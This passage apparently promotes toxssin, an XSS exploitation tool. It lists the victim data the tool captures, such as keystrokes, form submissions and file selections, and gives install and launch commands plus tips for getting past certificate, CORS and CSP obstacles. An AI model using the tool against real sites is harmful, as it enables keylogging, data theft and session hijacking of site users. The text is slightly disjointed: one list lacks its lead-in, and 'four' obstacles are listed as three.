The impact of these attacks varies from small changes that potentially affect a user's experience to far-reaching damage, depending on the sensitivity of the data handled by the vulnerable site, as well as mitigation efforts.
- key strokes,
- paste events,
- input change events,
- file selections,
- form submissions,
- server responses,
- table data,
Some important features of toxssin:
- It tries to create XSS persistence while the user is browsing the site, intercepting the http requests and responses and rebuilding the document, when in fact the location of the document never changes,
- Supports session management (you can use it to exploit multiple targets simultaneously, e.g. by running a series of XSS-based phishing attacks or by exploiting some stored XSS);
- Supports running custom JS scripts in sessions (once a browser is connected, you can run custom JS scripts in it),
- Automatically records every session.
Installation and use
git clone https://github.com/t3l3machus/toxssin
pip3 install -r requirements.txt
To run toxssin.py, you need to download the ssl and private key files.
It is achieved with the following command:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
It is recommended that you run toxssin with a trusted certificate. You are then able to run the program by running the toxssin server as follows:
# python3 toxssin.py -u https://your.domain.com -c /your/certificate.pem -k /your/privkey.pem
You will find more details here.
XSS exploitation difficulties
There are 4 major obstacles when it comes to Cross-Site Scripting attacks:
- the “NET::ERR_CERT_AUTHORITY_INVALID” error, which indicates that the server's certificate is not trusted / has expired and can be bypassed by using a certificate issued by a trusted source.
- Cross-origin resource sharing (CORS), handled appropriately by the toxssin server.
- The Content-Security-Policy header with script-src set to domain-specific only will prevent scripts with cross-domain src from being loaded. Toxssin relies on the eval() function to deliver the payload, so if the site has a CSP and unsafe-eval source is not specified in script-src, the attack will likely fail.
You can download the program from here